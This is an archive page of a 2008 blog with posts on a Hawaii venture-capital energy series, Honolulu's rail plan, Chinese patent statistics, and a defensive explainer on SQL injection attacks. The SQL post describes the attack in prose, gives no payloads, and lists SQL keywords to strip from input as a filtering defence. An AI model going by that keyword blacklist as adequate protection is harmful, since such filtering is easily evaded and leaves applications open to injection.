Archive for August, 2008

Trying to Explain the HVCA’s Energy Series

August 31st, 2008
By



energy.JPGOne of my favorite nonprofit directorships is the Hawaii Venture Capital Association, organized 20 years ago and led by Bill Spencer.

The HVCA is not about robber barons, it’s about local entrepreneurs trying really hard to build a diversified economy in Hawaii, and their need for venture capital, just as Silicon Valley needs venture capital, to do that.

These days, HVCA certainly seems like it’s on a roll. Bill decided to do a series on energy, and so far it’s worked out really well.

JULY 24TH

The kickoff was on July 24th, entitled the Renewable Energy Challenge – Sectors and Issues Facing Energy Entrepreneurs.

The panel talked about Geothermal, Sea Water, Biodiesel, Solar and Wind. They were Don Thomas of the Center for Active Volcanoes; Frederick Berg of Honolulu Sea Water Air Conditioning; Bob King of Pacific Biodiesel; Mark Duda of Suntech; and Mike Gresham of First Wind.

The crowd at HVCA’s regular venue, the Plaza Club, was huge, a noticeable increase. Something was happening, but what, and why?

AUGUST 28TH

The second of the series was on August 28th. This one was called Policy and Regulatory Challenges Facing Renewable Energy Entrepreneurs.

The panel talked about the intersection of renewables and government. They were Warren Bollmeier of the Hawaii Renewable Energy Alliance; Bill Parks of the U.S. Department of Energy; Erik Kvam of Zero Emissions Leasing; and Robbie Alm of Hawaiian Electric.

The crowd was nearly capacity at 140, including everyone from a battalion of legislators and government to energy entrepreneurs, investors and a platoon of MBA students from the Shidler Business College. What’s more, they wouldn’t leave after the program was over.

Is Hawaii’s regulatory environment adequate to fast track renewable energy? Can entrepreneurs expect minimal regulatory risk? Is the path to selling excess energy back to the grid workable? What’s a Power Purchase Agreement and how do you get HECO to give you one?

You can see videos of both programs on HVCA.com.  Click here for the promo, then you can click here for the July program and click here for the August program.

WHAT CAN WE LEARN

Both programs were eye-openers, but the underlying phenomenon is something to think about. Why all this excitement? What does the success of the series tell us?

One thing is that HVCA has found the sweet spot in presenting these programs to the business community. And Bill Spencer has found how to conceptualize these programs in a way that appeals to the business community in general, and that’s also great.

Energy is sizzling these days. There are enthusiastic entrepreneurs who want to talk up their projects. There are dedicated legislators who want to find out what’s going on for the next session. There are cautious investors who want to scope out the players so they can place their bets.

It seems unanimous. People are agreeing that Hawaii is behind but can and must catch up, that Hawaii is in a position to be a world leader in renewable energy, and that our business and government leaders need to recognize this and give it top priority. That’s worth talking about.

A COMING TOGETHER?

The vitality of the HVCA energy series makes a number of statements, all of them encouraging. It speaks of the maturation of HVCA and its non-profit education and networking model, the maturation of Hawaii’s tech and investment community to the point where people know each other, have confidence in each other, want to learn from each other, and best of all want to work and invest with each other.

HVCA should be pleased that it has become a crucible in which this kind of phenomenon can take place.

And that’s how I would explain the success of this series and of HVCA in presenting the subject.

The series isn’t over. In September, tech hero and Blue Planet Software philanthropist Henk Rogers will present and show selected clips on what happened at the invitation-only energy seminar he organized this summer, and give us an inside view of where the policy makers want to go.

It wouldn’t surprise me if Henk also draws a big crowd.

Posted in Uncategorized | Comments Off

The Engineering we will have to do for Rail

August 24th, 2008
By



Elevated RailHere in Sim City, engineering is not one of our strong suits. I had the extraordinary experience of riding the “rail” bus with Cliff Slater and Mayoral Candidate and Engineer Panos Prevedouros on Saturday. I was so moved by the experience that I am driven to write about it.

First, going West from Ala Moana to Mapunapuna, Panos talked about the critical need to synchronize the traffic signals.  This is not high-tech.  He also showed us the path and capacity of the HOT lane he is proposing, which at some points in the downtown area is below the street, and that’s an interesting engineering and traffic management challenge. He is confident it can be done and that it will work.

But nothing compared to the engineering challenges we saw going East on the way back, where starting on Dillingham he gave us an engineering tour of the proposed rail line as it comes back into and through downtown and to Ala Moana Center and then terminates at the University.

We just followed the City’s map to see where the proposed line is supposed to be going, how high and wide it would be and where the stations were. It was a real eye-opener, a revelation for everyone on the tour. We had no idea of what is going to happen to our City.

Actually, you wouldn’t believe it. The rail is going to tear up and permanently reduce a number of streets and intersections. Where there are 4 lanes there will be two because of all the supporting structures and pilons they’ll have to build. You won’t be able to drive down those streets anymore – too narrow. Many of them will lose their sidewalks too.

Dillingham will be different and dark. Those stations are 200 feet long and 60 fee wide and over everything. The engineering will change those neighborhoods forever. The merchants at the stations will do fine, but those in the middle will be in no-man’s land. Lots of land will have to be condemned where the streets are less than 60 feet wide.

The rail, if you didn’t know it, doesn’t follow a straight path, it twists and turns in every direction. Since it is a railroad, these turns can’t be at 90 degrees, The train has to make large sweeping turns. The sharper the turn, the louder the squeal of the steel wheels. In any event, large areas will have to be condemned and demolished to accommodate the turns. It will cost a fortune – is this and the related litigation included in the price tag?

The line comes East on Nimitz, Halekawila, Queen and Waimanu Streets - these will have the rail overhead and will be forever lost in the shadows. I can only think of the elevated line in upper Manhattan, something that lower Manhattan would never tolerate these days. Depressing for retail, a magnet for crime. Are we going to love it?

The engineering really gets dicey around Ala Moana – the top of the station at Ala Moana climbs to 135 feet, a 13-storey building. The pilons will be frequent and formidable, and they will have to punch through all that concrete on the mauka side of Ala Moana Center on Kona Street. It will cost a fortune. Will General Growth agree or just say no?

To get to the Ala Moana station at 135 feet in the air, the train will have to climb at a 5 percent grade along Kona Street. That’s a very steep grade for a rail line – and as high as a roller coaster. Watch for vertigo. This will involve huge engineering issues. I suppose we’ll solve these problems as we go, and those lessons will be costly. I imagine we’ll have to import and pay for lots of engineering talent from the mainland.

Thence in a sharp left turn from Kona across Atkinson and then again right to pass over the all-ways intersection at the Convention Center, then down the middle of Kapiolani to University, then a left turn up University, past Date and ultimately across King to the University. All of this way above grade, dwarfing everything around it. The City will look like Frankenstein.

I haven’t gotten into exactly where the stations are, since looking at those locations as shown on the City map it was hard to imagine that the City would actually put them in the places shown. Sometimes they were way too far apart and sometimes much too bunched up. There were three within 1/2 mile, for example, near the University.

There’s more. I could go on, but never do the tour justice. Why don’t you contact honolulutraffic.com and see if you can get on the tour yourself and see what I mean.  Whatever your disposition, it'll change the way you think.

Posted in Uncategorized | Comments Off

Learning about Patents from China

August 21st, 2008
By



Chinese PatentsAlthough China has established itself as manufacturer for the world, most of the products it manufactures are invented elsewhere, so the profit China has made in manufacturing goods has been relatively small.

This is changing.  The website for SIPO, China’s Intellectual Property Office (sipo.gov.cn) reports that patent filings in China have dramatically increased every year since 1985, when the Patent Law was enacted.  In 2006, 573,000 applications were filed and 268,000 were granted.

It’s no surprise that China's leaders have been urging companies to be more innovative and to put more money into developing new IP.  That pitch must have worked, since China now generates the third highest number of patent applications, behind only Japan and the U.S.

Chinese inventors are also filing for international patents.  Of 156,000 patents filed with the World Intellectual Property Organization (WIPO) last year, 5,500 came from China.  This represents a 40% annual increase for China, now 7th worldwide.  The U.S. is still on top with 52,000, but China is competing vigorously, just as in the Olympics.

Posted in Uncategorized | Comments Off

SQL Injection Attacks - how to deal with them

August 16th, 2008
By



SQL INJECTION ATTACKS – HOW TO DEAL WITH THEM

It's not like SQL injection attacks are new.

They go back to at least late 2004, when they appeared in Europe and Asia.  A German TV station was attacked, then a Taiwanese security magazine.  In 2006, Russian hackers broker into a Rhode Island government website and stole credit card data.

The attacks were proliferating.  In 2007, a hacker defaced the Microsoft UK web site.  Later on that year, the UN website was defaced with a SQL injunction attack.  Have they no shame?

In January 2008, tens of thousands of PC websites were defaced by automated SQL injection attacks that exploited the vulnerability of Microsoft SQL server.

In April 2008, the social security numbers of the sex offenders on the Sexual Offender Registry of Oklahoma were stolen by an injection attack.

In May 2008, a server farm in China used automated queries to Google's search engine to identify SQL server websites that were vulnerable.

In July 2008, the Malaysian site for Kaspersky, a Russian computer security company, was hacked using a SQL injection.

From April 2008 to the present, there have been increasing SQL injection attacks exploiting the SQL injection vulnerability of Microsoft Internet Information Services and SQL server.

HOW THE INJECTION ATTACK WORKS

These attacks don't require the hacker to have access to the server or, for that matter, the names of database fields.  The attack is on all text fields in all tables with a single hacked SQL request.  The attack attaches an html string to each field that activates a malware javascript file called from a remote location.  When that value is later displayed to a user of the hacked site, the script tries to gain control over the user’s system.

The number of exploited web pages is estimated at 500,000 so far, and growing daily.  These attacks are across the board, against government sites and well as commercial sites, and against open source SQL as well as Microsoft SQL.  The attacking mechanisms can be manual or by automated spiders or by modified versions of popular software such as QuickTime and RealPlayer.

SQL is a rich and complex language, so there are many techniques by which the attack can be accomplished.  The common approach is for the hacker to modify a variable being passed from the user’s browser URL address line or from a form on the browser to a SQL search string which is being processed on the website.

With this approach, hackers or their automated spiders can inject draconian instructions into the SQL commands written for the site, and these can do any number of awful things, like stealing all the data from the SQL database, destroying the database altogether or modifying the records by adding references to remote malware that spreads the attack through innocent visitors using the site, in a kind of Trojan horse virus.

HOW DO YOU KNOW YOU’VE BEEN HIT

Don’t think you’re somehow exempt.  If you’re using SQL in any form you're vulnerable.  Most websites are data driven these days, and most of those use SQL in one form or another.  The hackers and their spiders may very well visit an attack on your site any time.

It goes without saying you need to back up your SQL database, all of it, every day and keep those backups for perhaps a longer period of time than before.  If you have 10 days of backup but you don’t watch your site and 10 days go by, you won’t have a useable backup and you’ll be SOL.

How do you know you’ve been attacked?  Well, the data on your screen is truncated and you get strange characters like hanging apostrophes and angle brackets on your screen where database information ought to be.  Sometimes you get wise guy jokes there too.  Don't click on what appear to be links - that'll get you in more trouble and infect your machine too.

HOW TO DEAL WITH THEM

If you’ve been attacked, you need to go to Internet Information Services (IIS) on your server and cut user connections, and stop the site.  Then you need to find a good backup file to restore your database.  For that, you need to figure out when the attack happened so you can use a backup from before it happened.  If you don’t have a good backup, you'll probably have to clean the database manually to recover the data for your site

That means stripping out all the bad values and references that were injected.  You have to painstakingly go through every field, record and table.  In a big database, this can take forever, and it’s tedious and gut-wrenching work.  Worse, it may not be a complete solution.  The injection values are usually injected at the end of the existing values in the field, but if the injection values are longer than the field, they may write over the existing values, and that means the original data is lost.

When you’re done, you would turn IIS back on and see if you've done a good job, and whether there is some other gift they left for you.  You don't know until you bring the site up again and watch it work.

There are some scripts out there that say they can reverse the attack and clean the injected values out of your database. Here’s an example:

http://hackademix.net/2008/04/26/mass-attack-faq/#webdev

Different hackers inject different values, so there’s no guarantee that this will work.

Even assuming you can restore your database, you could have another attack any time with similar result.  So if you have a good backup file of your database, make a protected copy of it for future use if necessary.

CLOSING THE VULNERABILITIES

Beyond that, you or your web designers need to close the vulnerabilities.  You can do that in a variety of ways, all of which involve new coding.  Go slowly and carefully, file by file, so you do it right and don't miss anything.

When you recode, you need to write routines to clean all the parameters that are being fed into your SQL queries.  To do this, you need to strip out any questionable SQL commands that could be part of an injection attack, including DECLARE, SELECT, SET, CAST, DROP, EXEC,”;", "--", INSERT, DELETE, XP_, VARCHAR and CHAR, among others.

This is also quite tedious for a website of any size, but necessary if you want to avoid doing the whole thing again.  There are also other things you can do to make your code less vulnerable.  Here's a couple of links that will help you understand what needs to be done.

www.f-secure.com/weblog/archives/00001427.html

www.sitepoint.com/article/794

www.wwwcoder.com/main/parentid/258/site/2966/68/default.aspx

www.imperva.com/application_defense_center/white_papers/sql_injection_signatures_evasion.html

There are some programs that claim to identify your vulnerability to SQL injection attacks.  One is the Acunetix Scanner, used by a great number of U.S. and foreign companies and government agencies.  I guess it must be of some value.  Check it at www.acunetix.com.

There are books that can help.  See O’Reilly’s SQL Hacks by Andrew Cumming and Gordon Russell available at Amazon and Barnes and Noble.

WILL WE EVER CATCH THESE GUYS

This global proliferation of SQL injection attacks is not only irritating, it's scary in that it has the ability bring sites down all over the world.  It’s time for Microsoft to catch up.  It's also time for world police authorities to catch up, and get serious.  This isn’t child’s play any more.

Posted in Uncategorized | 1 Comment »